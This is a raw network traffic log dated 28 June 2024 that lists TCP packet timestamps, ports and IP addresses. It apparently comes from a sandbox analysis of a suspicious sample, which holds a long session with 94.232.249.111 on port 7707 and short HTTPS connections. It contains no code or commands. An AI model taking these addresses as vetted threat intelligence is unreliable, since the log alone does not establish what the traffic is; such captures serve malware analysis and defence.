                                                                  Jun 28, 2024 11:19:24.695560932 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695575953 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695604086 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695847034 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695859909 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695872068 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695883036 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695903063 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695923090 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.695930004 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.695965052 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.696779966 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696799994 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696810961 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696867943 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.696960926 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696973085 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696984053 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.696995020 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697000980 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697037935 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697154999 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697165966 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697176933 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697189093 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697202921 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697220087 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697356939 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697369099 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697379112 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697397947 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697422028 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697499990 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697511911 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697526932 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697563887 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697655916 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697666883 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697678089 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.697690964 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.697731018 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.699604988 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.699664116 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.699675083 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.699702978 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.699707985 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.699748039 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.700561047 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700601101 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700617075 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700638056 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.700723886 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700736046 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700747013 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700757980 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700762033 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.700786114 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.700948954 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700959921 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700970888 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700983047 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.700989962 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.700995922 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701009989 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.701036930 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.701163054 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701174021 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701185942 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701221943 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.701586008 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701625109 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.701647043 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701658964 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701695919 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.701723099 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701736927 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.701773882 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:24.702369928 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.702389002 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:24.702425003 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.391511917 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.395083904 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.396699905 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:25.396758080 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.401576996 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:25.401658058 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.401985884 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:25.402534962 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:25.407855034 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:26.352910042 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:26.353595018 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:26.353755951 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:26.353811026 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:26.358397961 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:27.519640923 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:27.522324085 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:27.524451017 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:27.527478933 CEST77074974094.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:27.527554035 CEST497407707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.354628086 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.359544039 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.359610081 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.364399910 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.492472887 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.540635109 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.620266914 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.687274933 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.723648071 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.743194103 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.748106956 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:37.748262882 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:37.753057957 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.753809929 CEST6478880192.168.2.4104.16.184.241
                                                                  Jun 28, 2024 11:19:38.758728981 CEST8064788104.16.184.241192.168.2.4
                                                                  Jun 28, 2024 11:19:38.758799076 CEST6478880192.168.2.4104.16.184.241
                                                                  Jun 28, 2024 11:19:38.758981943 CEST6478880192.168.2.4104.16.184.241
                                                                  Jun 28, 2024 11:19:38.763967037 CEST8064788104.16.184.241192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818356991 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818427086 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818439960 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818486929 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.818531990 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818550110 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818561077 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818572044 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818588018 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.818603039 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.818785906 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818798065 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818808079 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818820000 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818833113 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.818865061 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.818967104 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818978071 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.818989038 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819000006 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819011927 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819020987 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819025040 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819051981 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819221020 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819232941 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819242954 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819253922 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819263935 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819281101 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819288969 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819314003 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819458008 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819468021 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819478035 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819488049 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819498062 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819504023 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819526911 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819763899 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819773912 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819780111 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819792032 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819802046 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819813013 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819818020 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819823980 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819834948 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.819844961 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.819863081 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.820162058 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820173025 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820183039 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820194006 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820204020 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820207119 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.820215940 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820226908 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820234060 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.820281029 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:19:38.820456982 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820467949 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:19:38.820477009 CEST77074973994.232.249.111192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 28, 2024 11:19:38.820504904 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.825174093 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.825185061 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.825222969 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.825249910 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.825262070 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.825270891 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.825306892 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.825321913 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.829863071 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.829874039 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.829917908 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.830030918 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.830040932 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.830080032 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.834580898 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.834590912 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.834630013 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.834709883 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.834748983 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.834786892 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.839355946 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.839368105 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.839376926 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.839406967 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.839504957 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.839519978 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.839546919 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.844206095 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.844217062 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.844259977 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.844290972 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.844302893 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.844310999 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.844340086 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.844358921 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.849024057 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.849040031 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.849050045 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.849081993 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:38.902743101 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:38.902803898 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:39.099190950 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:39.102407932 CEST | 64789 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:39.104073048 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:39.104186058 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:39.107127905 CEST | 7707 | 64789 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:39.107188940 CEST | 64789 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:39.108189106 CEST | 64789 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:39.109163046 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:39.112994909 CEST | 7707 | 64789 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:39.202603102 CEST | 80 | 64788 | 104.16.184.241 | 192.168.2.4
Jun 28, 2024 11:19:39.243738890 CEST | 64788 | 80 | 192.168.2.4 | 104.16.184.241
Jun 28, 2024 11:19:39.279683113 CEST | 64790 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:39.279706001 CEST | 443 | 64790 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:39.279793024 CEST | 64790 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:39.283127069 CEST | 64790 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:39.283143044 CEST | 443 | 64790 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:39.869626045 CEST | 7707 | 64789 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:39.870390892 CEST | 64789 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:39.875298977 CEST | 7707 | 64789 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:39.877720118 CEST | 443 | 64790 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:39.877801895 CEST | 64790 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:39.879626989 CEST | 64790 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:39.879632950 CEST | 443 | 64790 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:39.879903078 CEST | 443 | 64790 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:39.931267977 CEST | 64790 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:39.936378956 CEST | 64790 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:39.976522923 CEST | 443 | 64790 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:40.039238930 CEST | 443 | 64790 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:40.039324999 CEST | 443 | 64790 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:40.039642096 CEST | 64790 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:40.039994955 CEST | 64790 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:40.044071913 CEST | 64788 | 80 | 192.168.2.4 | 104.16.184.241
Jun 28, 2024 11:19:40.049455881 CEST | 80 | 64788 | 104.16.184.241 | 192.168.2.4
Jun 28, 2024 11:19:40.049520016 CEST | 64788 | 80 | 192.168.2.4 | 104.16.184.241
Jun 28, 2024 11:19:40.051991940 CEST | 64791 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.052016020 CEST | 443 | 64791 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:40.052139997 CEST | 64791 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.052460909 CEST | 64791 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.052474976 CEST | 443 | 64791 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:40.674192905 CEST | 443 | 64791 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:40.674273968 CEST | 64791 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.676103115 CEST | 64791 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.676109076 CEST | 443 | 64791 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:40.676409006 CEST | 443 | 64791 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:40.677820921 CEST | 64791 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.677850008 CEST | 443 | 64791 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:40.854228973 CEST | 443 | 64791 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:40.854294062 CEST | 443 | 64791 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:40.854356050 CEST | 64791 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.857003927 CEST | 64791 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.868889093 CEST | 64792 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.868907928 CEST | 443 | 64792 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:40.868985891 CEST | 64792 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.869843960 CEST | 64792 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:40.869856119 CEST | 443 | 64792 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:41.051122904 CEST | 64789 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:41.056786060 CEST | 7707 | 64789 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:41.056854963 CEST | 64789 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:41.468919992 CEST | 443 | 64792 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:41.470597982 CEST | 64792 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:41.470624924 CEST | 443 | 64792 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:41.725996017 CEST | 443 | 64792 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:41.726073027 CEST | 443 | 64792 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:41.726114988 CEST | 64792 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:41.726541996 CEST | 64792 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:52.138338089 CEST | 64795 | 80 | 192.168.2.4 | 104.16.184.241
Jun 28, 2024 11:19:52.143527985 CEST | 80 | 64795 | 104.16.184.241 | 192.168.2.4
Jun 28, 2024 11:19:52.143593073 CEST | 64795 | 80 | 192.168.2.4 | 104.16.184.241
Jun 28, 2024 11:19:52.143790007 CEST | 64795 | 80 | 192.168.2.4 | 104.16.184.241
Jun 28, 2024 11:19:52.150696993 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:52.151371002 CEST | 80 | 64795 | 104.16.184.241 | 192.168.2.4
Jun 28, 2024 11:19:52.155513048 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:52.155582905 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:52.162584066 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:52.481148958 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:52.525026083 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:52.609555006 CEST | 80 | 64795 | 104.16.184.241 | 192.168.2.4
Jun 28, 2024 11:19:52.616657972 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:52.618395090 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:52.623236895 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:52.623336077 CEST | 49739 | 7707 | 192.168.2.4 | 94.232.249.111
Jun 28, 2024 11:19:52.628182888 CEST | 7707 | 49739 | 94.232.249.111 | 192.168.2.4
Jun 28, 2024 11:19:52.650017977 CEST | 64795 | 80 | 192.168.2.4 | 104.16.184.241
Jun 28, 2024 11:19:52.666812897 CEST | 64796 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:52.666846991 CEST | 443 | 64796 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:52.666910887 CEST | 64796 | 443 | 192.168.2.4 | 104.21.44.66
